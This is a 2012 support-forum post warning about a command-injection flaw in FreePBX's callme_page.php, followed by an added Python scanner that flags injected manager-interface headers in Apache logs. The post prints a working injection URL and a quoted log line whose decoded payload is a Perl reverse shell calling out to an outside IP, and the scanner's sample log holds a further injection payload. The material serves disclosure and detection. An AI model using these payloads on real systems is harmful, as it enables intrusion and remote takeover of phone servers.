Support A2Billing :

provided by Star2Billing S.L.

All times are UTC
 Post subject: FreePBX Security Issues.
PostPosted: Thu Mar 29, 2012 1:30 am 

Joined: Thu Sep 08, 2011 5:17 pm
Posts: 6
Location: Newcastle Upon Tyne, United Kingdom
Hi,

Just thought I'd let you all know of a security concern with FreePBX. For those of you who make the conscious decision to run FreePBX and leave the web interface on a public IP address, I'd strongly recommend that you at the very least remove the /recordings interface.

We had a customer's VPS server compromised, and running through some logs we noticed a very worrying issue.

It appears the /recordings/misc/callme_page.php has a very serious sanitisation error.

What does that mean for me?

What it means is that someone with bad intentions can execute code as if they are the root user of the system and potentially gain access to your system.

How do I prevent this?

Ideally the answer to this question would be to refrain from using FreePBX but in practice that's not always possible. I would suggest putting at the very least the Web interface behind a firewall/ACL.

So what does the hack look like?

Like so:

Code:
http://myfreepbx-ip/recordings/misc/callme_page.php?action=c&callmenum=1001@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20echo%20fucked%20>%20/var/www/html/recordings/misc/lol%0D%0A%0D%0A


All it's going to do is create a file in your recordings folder, but nonetheless the plausibility is there for it to be used to compromise a full system. Once in, they could easily gain access to MySQL and wreak havoc.

If you're running CentOS like us, I'd suggest running the following command:

Code:
cat /var/log/httpd/access_log* | grep recordings


If you start to see anything with a very long URL after the callmenum querystring parameter then it's possible your box may be compromised as well.

Quote:
[root@voip02(/)> cat /var/log/httpd/access_log* | grep recordings
213.142.137.231 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22178.63.10.87%3a53%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"


This translates to the following command being issued to Asterisk:

Code:
/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"178.63.10.87:53");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'



Fingers crossed this will prevent at least one person from falling victim to these bastards and getting duped out of a lot of VoIP Credit.


Regards
Dean.


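The grep in the post above finds every hit on /recordings, but it leaves you to eyeball percent-encoded URLs. The script below is an added example (not code from the post, from FreePBX or from A2Billing) that does the decoding for you: it parses Apache access_log lines, pulls the callmenum parameter out of requests to callme_page.php, percent-decodes it, and reports any CR/LF-separated AMI headers smuggled in after the extension, so the decoded "Application: system / Data: ..." pair shown in the post falls out automatically. It also carries the hardened allow-list check (is_safe_callmenum) a fix for this bug would apply before the value ever reaches the manager interface. The log lines, the addresses (documentation ranges) and the assumption that a legitimate callmenum is just an extension plus an optional @context are all constructed for the example; the detector is general in that it reports whatever injected headers it finds, not only Application/Data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access_log lines (not taken from the post above).
# Line 1 carries a CRLF-injected AMI payload in callmenum; lines 2 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2012:08:54:19 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%20%3E%20/tmp/pwned%0D%0A%0D%0A HTTP/1.0" 200 947 "-" "Python-urllib/1.17"
198.51.100.7 - - [25/Mar/2012:09:01:02 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=1001@from-internal HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [25/Mar/2012:09:05:44 +0100] "GET /recordings/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Common Log Format prefix: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed shape of a legitimate callmenum: extension plus optional @context,
# e.g. 1001@from-internal. CR, LF, space and ':' are deliberately outside the set.
SAFE_CALLMENUM_RE = re.compile(r'[0-9A-Za-z*#+.@_-]+')


def is_safe_callmenum(value):
    """Hardened allow-list check: True only if value can be placed in an AMI header safely."""
    return SAFE_CALLMENUM_RE.fullmatch(value) is not None


def callme_injection(target):
    """Return the AMI headers smuggled via callmenum in a request target, or None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/recordings/misc/callme_page.php"):
        return None
    # parse_qs percent-decodes, so %0D%0A becomes a real CR LF pair here.
    callmenum = parse_qs(parts.query).get("callmenum", [""])[0]
    if is_safe_callmenum(callmenum) or not re.search(r"[\r\n]", callmenum):
        return None
    lines = re.split(r"\r\n|\r|\n", callmenum)
    injected = []
    for line in lines[1:]:            # everything after the first CR/LF is attacker-supplied
        if ":" in line:
            key, val = line.split(":", 1)
            injected.append((key.strip(), val.strip()))
    runs_system = any(k.lower() == "application" and v.lower() == "system"
                      for k, v in injected)
    return {"callmenum": callmenum, "channel_tail": lines[0],
            "injected": injected, "runs_system": runs_system}


def scan_log(text):
    """Scan access_log text; return one finding per request that injects AMI headers."""
    findings = []
    for raw in text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue
        hit = callme_injection(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} "
              f"system_app={'yes' if f['runs_system'] else 'no'}")
        for k, v in f["injected"]:
            print(f"    {k}: {v}")
```

To use it on a real box, replace SAMPLE_LOG with the contents of /var/log/httpd/access_log* (the rotated files too, as the post's grep does). A 200 status on a flagged request does not by itself prove the command ran, but a finding with Application: system is exactly the pattern in the quoted log line and warrants treating the host as compromised until proven otherwise.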